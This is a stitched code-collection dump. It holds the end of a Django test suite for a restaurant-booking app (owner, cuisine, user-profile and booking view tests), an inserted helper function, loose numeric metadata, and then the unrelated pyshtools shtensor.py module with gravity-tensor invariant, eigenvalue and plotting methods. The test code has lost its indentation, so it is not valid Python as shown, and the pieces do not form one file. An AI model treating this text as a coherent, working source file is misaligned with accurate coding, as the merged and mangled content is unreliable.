response = self.client.post(reverse('webapp:restaurant_update', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, "Restaurant doesnot exists..")
def test_view_loads(self):
""" View loaded with data related to restaurant should be loaded for GET request
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.get(
reverse('webapp:restaurant_update', args=(restaurant.id,)))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webapp/restaurant_form.html')
def test_view_fails_invalid(self):
""" Validation error in updating should be shown if invalid data is posted
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
self.credentials = CREDENTIALS.copy()
self.credentials['longitude'] = 'error'
response = self.client.post(
reverse('webapp:restaurant_update', args=(restaurant.id,)), self.credentials)
self.assertFormError(response, 'form', 'longitude', 'Enter a number.')
def test_view_valid_post(self):
""" If there is no validation error then it should redirect to restaurant's detail page
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
type1 = Type.objects.create(name="test")
cuisine1 = Cuisine.objects.create(name="test")
self.credentials = CREDENTIALS.copy()
self.credentials["types"] = [type1.id]
self.credentials["cuisines"] = [cuisine1.id]
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.post(
reverse('webapp:restaurant_update', args=(restaurant.id,)), self.credentials)
self.assertRedirects(response, reverse('webapp:detail', args=(1,)))
def test_view_delete_restaurant(self):
""" If there is delete_btn in POST request submission the restaurant object
should be deleted and page must be redirected to index page"
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.post(reverse('webapp:restaurant_update', args=(
restaurant.id,)), {'delete_btn': 'delete_btn'})
self.assertRedirects(response, reverse('webapp:index'))
class CuisineCreateViewTests(TestCase):
def test_cuisine_create_form_pop_up(self):
""" When Add cuisine button is pressed popup should appear with
add cuisine form
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:cuisine_create'))
self.assertTemplateUsed(response, 'webapp/popup_form.html')
def test_cuisine_create_form_with_blank_data(self):
""" Cuisine create form should notify the error when blank data is submitted
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:cuisine_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_cuisine_create_form_with_valid_data(self):
""" Cuisine create form should disappear and notify of cuisine creation
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:cuisine_create'), {
'name': 'TEST CUISINE'})
self.assertEqual(response.status_code, 302)
# TODO: self.assertContains(response, 'New Cuisine Created.')
class TypeCreateViewTests(TestCase):
def test_type_create_form_pop_up(self):
""" When Add cuisine button is pressed popup should appear with
add cuisine form
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:type_create'))
self.assertTemplateUsed(response, 'webapp/popup_form.html')
def test_type_create_form_with_blank_data(self):
""" Cuisine create form should notify the error when blank data is submitted
"""
create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:type_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_type_create_form_with_valid_data(self):
""" Cuisine create form should disappear and notify of cuisine creation
"""
create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:type_create'), {'name':'TEST TYPE'})
self.assertEqual(response.status_code, 302)
# TODO: self.assertContains(response, 'New Cuisine Created.')
class UserCreateViewTests(TestCase):
def test_user_create_view_loads(self):
""" GET request to user create view must load the signup form
"""
response = self.client.get(reverse('register_user'))
self.assertTemplateUsed(response, 'webapp/registration/signup_form.html')
def test_owner_create_view_load(self):
""" GET request to owner create view must load the signup form
"""
response = self.client.get(reverse('register_owner'))
self.assertTemplateUsed(response, 'webapp/registration/signup_form.html')
def test_user_create_view_valid_data(self):
""" POST with valid request must redirect to login page
"""
response = self.client.post(reverse('register_user'), {'username':'test', 'email':'test@example.com', 'password1':'TampereFI', 'password2':'TampereFI'})
self.assertRedirects(response, reverse('login'))
def test_owner_create_view_valid_data(self):
""" POST with valid request must redirect to login page
"""
response = self.client.post(reverse('register_owner'), {'username':'test', 'email':'test@example.com', 'password1':'TampereFI', 'password2':'TampereFI'})
self.assertRedirects(response, reverse('login'))
class UserProfileViewTests(TestCase):
def test_user_profile_view_loads(self):
""" Profile view must be of the logged in user
"""
owner = create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:profile'))
self.assertContains(response, 'Test User')
def test_user_profile_view_with_booking_list(self):
""" Profile view of user must load with the list of bookings they have made
"""
user = User.objects.create_user(username='Test User', password='testpwd')
group = Group.objects.create(name='customer')
user.groups.add(group)
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:profile'))
self.assertQuerysetEqual(response.context['context_list'], ['<Booking: Test Restaurant, Time: ' + booking_date.strftime('%Y-%m-%d %H:%M:%S') + '>'])
def test_owner_profile_view_with_restaurant_list(self):
""" Profile view of owner must load with the list of restaurant they own
"""
owner = create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.get(reverse('webapp:profile'))
self.assertQuerysetEqual(response.context['context_list'], ['<Restaurant: Test Restaurant>'])
class BookingViewTests(TestCase):
def test_booking_creation_view_load(self):
""" Booking creation view should load with restaurant selected
whose book table button was clicked
"""
restaurant = create_restaurant('Test Restaurant')
response = self.client.get(reverse('webapp:booking_create', args=(restaurant.id,)))
self.assertTemplateUsed(response, 'webapp/booking_form.html')
self.assertEqual(response.context['restaurant_id'], str(restaurant.id))
def test_booking_creation_view_without_login(self):
""" Try to create Booking without login should should show appropriate
message and same booking create form should be displayed
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user, 'restaurant':restaurant, 'booking_date':booking_date, 'number_of_people':2}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'You must Login to make bookings!!')
self.assertRedirects(response, reverse('webapp:booking_create', args=(restaurant.id,)))
def test_booking_create_view_with_invalid_data(self):
""" Booking update view with invalid data
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':'two', 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
self.assertFormError(response, 'form', 'number_of_people', 'Enter a whole number.')
def test_booking_creation_view_with_login(self):
""" Booking creation by logged in user should be redirected to
next url given in the POST request
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':2, 'next':reverse('webapp:index')}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
self.assertRedirects(response, reverse('webapp:index'))
def test_booking_update_view_with_no_booking_found(self):
""" If no booking found message must be shown to indicate that
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:booking_update', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking doesnot exists..')
def test_booking_update_view_load(self):
""" Booking update view should load with restaurant selected
whose book table button was clicked
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:booking_update', args=(booking.id,)))
self.assertTemplateUsed(response, 'webapp/booking_form.html')
self.assertEqual(response.context['restaurant_id'], restaurant.id)
self.assertEqual(response.context['booking_id'], str(booking.id))
def test_booking_update_view_with_login(self):
""" Booking update by logged in user should be redirected to
next url given in the POST request
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':3, 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_update', args=(booking.id,)), booking_credentials, follow=True)
self.assertRedirects(response, reverse('webapp:profile'))
def test_booking_update_view_with_invalid_data(self):
""" Booking update view with invalid data
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':'two', 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_update', args=(booking.id,)), booking_credentials)
self.assertFormError(response, 'form', 'number_of_people', 'Enter a whole number.')
def test_booking_delete_view_when_booking_object_notfound(self):
""" Booking delete view should show appropriate message
when trying to delete a booking that does not exist
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:booking_delete', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking doesnot exists..')
def test_booking_delete_view(self):
""" Booking delete view should delete booking with message
"""
restaurant = create_restaurant('Test Restaurant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:booking_delete', args=(booking.id,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking removed.')
# Helper functions
def create_restaurant(restaurant_name):
return Restaurant.objects.create(name=restaurant_name,
description="test restaurant",
state="test",
city="test",
street="test",
longitude=0.0,
latitude=0.0,
telephone="test",
website="test.com")
def create_owner(username, email, password):
user = User.objects.create_user(username=username, email=email, password=password)
group = Group.objects.create(name='owner')
set_permissions(group, 'webapp', 'restaurant')
set_permissions(group, 'webapp', 'type')
set_permissions(group, 'webapp', 'cuisine')
user.groups.add(group)
return user
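# --- Editorial note, not part of the original test module -----------------
# Most owner-facing tests above repeat the create_owner()/client.login()
# pair. A small helper along these lines (hypothetical, not used by the
# tests above) could collapse that boilerplate:
def create_and_login_owner(client, username='Test User',
                           email='test@example.com', password='testpwd'):
    """Create an owner via create_owner() and log the given test client in."""
    owner = create_owner(username, email, password)
    client.login(username=username, password=password)
    return owner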
| 44.586687
| 161
| 0.725654
| 3,568
| 28,803
| 5.711883
| 0.077074
| 0.035819
| 0.041511
| 0.042395
| 0.811335
| 0.777429
| 0.745093
| 0.728263
| 0.70157
| 0.694799
| 0
| 0.005579
| 0.147415
| 28,803
| 645
| 162
| 44.655814
| 0.824327
| 0.005486
| 0
| 0.584726
| 0
| 0
| 0.214406
| 0.039652
| 0
| 0
| 0
| 0.003101
| 0.169451
| 0
| null | null | 0.095465
| 0.02148
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 8
| 167c9f2314570c1155e94a618557e4d5e0a04fe7
| 176,595
| py
| Python
| pyshtools/shclasses/shtensor.py
| nephanth/SHTOOLS
| 663d267715639de65f244b1e5ff8826cda0e9c8d
| ["BSD-3-Clause"]
| 7
| 2015-03-11T10:03:47.000Z
| 2020-11-01T20:00:47.000Z
| pyshtools/shclasses/shtensor.py
| nephanth/SHTOOLS
| 663d267715639de65f244b1e5ff8826cda0e9c8d
| ["BSD-3-Clause"]
| 1
| 2016-07-18T15:14:19.000Z
| 2016-07-18T15:14:19.000Z
| pyshtools/shclasses/shtensor.py
| nephanth/SHTOOLS
| 663d267715639de65f244b1e5ff8826cda0e9c8d
| ["BSD-3-Clause"]
| 3
| 2016-11-27T03:14:39.000Z
| 2021-05-28T01:42:53.000Z
|
"""
Class for the gravity and magnetic field 'gradient' tensors.
"""
import numpy as _np
import matplotlib as _mpl
import matplotlib.pyplot as _plt
import copy as _copy
from scipy.linalg import eigvalsh as _eigvalsh
import xarray as _xr
from .shgrid import SHGrid as _SHGrid
class Tensor(object):
"""
Generic class for gravity and magnetic field tensors. To initialize the
class, use the method tensor() of an SHGravCoeffs or SHMagCoeffs
class instance.
"""
def __init__(self):
"""Unused constructor of the main class."""
print('Initialize the class using one of the two methods:\n'
'>>> pyshtools.SHGravCoeffs.tensor\n'
'>>> pyshtools.SHMagCoeffs.tensor\n')
def compute_invar(self):
"""
Compute the three invariants (I0, I1, I2) of the tensor, as well as
the quantity I = -(I2/2)**2 / (I1/3)**3.
"""
self.i0 = self.vxx + self.vyy + self.vzz
self.i1 = (self.vxx*self.vyy + self.vyy*self.vzz + self.vxx*self.vzz -
self.vxy**2 - self.vyz**2 - self.vxz**2)
self.i2 = (self.vxx*(self.vyy*self.vzz - self.vyz**2) +
self.vxy*(self.vyz*self.vxz - self.vxy*self.vzz) +
self.vxz*(self.vxy*self.vyz - self.vxz*self.vyy))
self.i = (-1.) * (self.i2 / 2.)**2
self.i.data[1:self.nlat-self.extend, :] /= \
(self.i1.data[1:self.nlat-self.extend, :] / 3.)**3
def compute_eig(self):
"""
Compute the three eigenvalues of the tensor: eig1, eig2, eig3.
"""
self.eig1 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eig2 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eig3 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
for i in range(self.nlat):
for j in range(self.nlon):
a = _np.array([[self.vxx.data[i, j],
self.vxy.data[i, j],
self.vxz.data[i, j]],
[self.vyx.data[i, j],
self.vyy.data[i, j],
self.vyz.data[i, j]],
[self.vzx.data[i, j],
self.vzy.data[i, j],
self.vzz.data[i, j]]])
eigs = _eigvalsh(a)
self.eig1.data[i, j] = eigs[2]
self.eig2.data[i, j] = eigs[1]
self.eig3.data[i, j] = eigs[0]
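# --- Editorial note, not part of the original pyshtools source ------------
# The nested per-point loops above could likely be replaced by one stacked
# call, since numpy.linalg.eigvalsh accepts arrays of shape (..., 3, 3) and
# returns eigenvalues in ascending order along the last axis. A hypothetical
# vectorized variant, under those assumptions:
def compute_eig_vectorized(self):
    """Editorial sketch: vectorized alternative to compute_eig()."""
    rows = [[self.vxx, self.vxy, self.vxz],
            [self.vyx, self.vyy, self.vyz],
            [self.vzx, self.vzy, self.vzz]]
    # Build a (nlat, nlon, 3, 3) stack of symmetric tensors.
    t = _np.stack([_np.stack([c.data for c in row], axis=-1)
                   for row in rows], axis=-2)
    eigs = _np.linalg.eigvalsh(t)  # ascending along the last axis
    self.eig1 = _SHGrid.from_array(eigs[..., 2], grid='DH')
    self.eig2 = _SHGrid.from_array(eigs[..., 1], grid='DH')
    self.eig3 = _SHGrid.from_array(eigs[..., 0], grid='DH')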
def compute_eigh(self):
"""
Compute the two horizontal eigenvalues of the tensor (eigh1, and
eigh2), as well as the combined maximum absolute value of the two
(eighh).
"""
self.eigh1 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eigh2 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eighh = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
for i in range(self.nlat):
for j in range(self.nlon):
a = _np.array([[self.vxx.data[i, j],
self.vxy.data[i, j]],
[self.vyx.data[i, j],
self.vyy.data[i, j]]])
eigs = _eigvalsh(a)
self.eigh1.data[i, j] = eigs[1]
self.eigh2.data[i, j] = eigs[0]
if abs(eigs[0]) >= abs(eigs[1]):
self.eighh.data[i, j] = eigs[0]
else:
self.eighh.data[i, j] = eigs[1]
def copy(self):
"""
Return a deep copy of the class instance.
Usage
-----
copy = x.copy()
"""
return _copy.deepcopy(self)
def info(self):
"""
Print a summary of the data stored in the SHGravTensor class instance.
Usage
-----
x.info()
"""
print(repr(self))
def plot_vxx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxx component of the tensor.
Usage
-----
x.plot_vxx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxx_label
return self.vxx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
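# Example (a sketch continuing the one in compute_invar above; assumes
# Cartopy is installed):
# >>> import cartopy.crs as ccrs
# >>> fig, ax = tensor.plot_vxx(projection=ccrs.Robinson(), show=False)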
def plot_vyy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyy component of the tensor.
Usage
-----
x.plot_vyy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyy_label
return self.vyy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzz component of the tensor.
Usage
-----
x.plot_vzz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzz_label
return self.vzz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vxy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxy component of the tensor.
Usage
-----
x.plot_vxy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
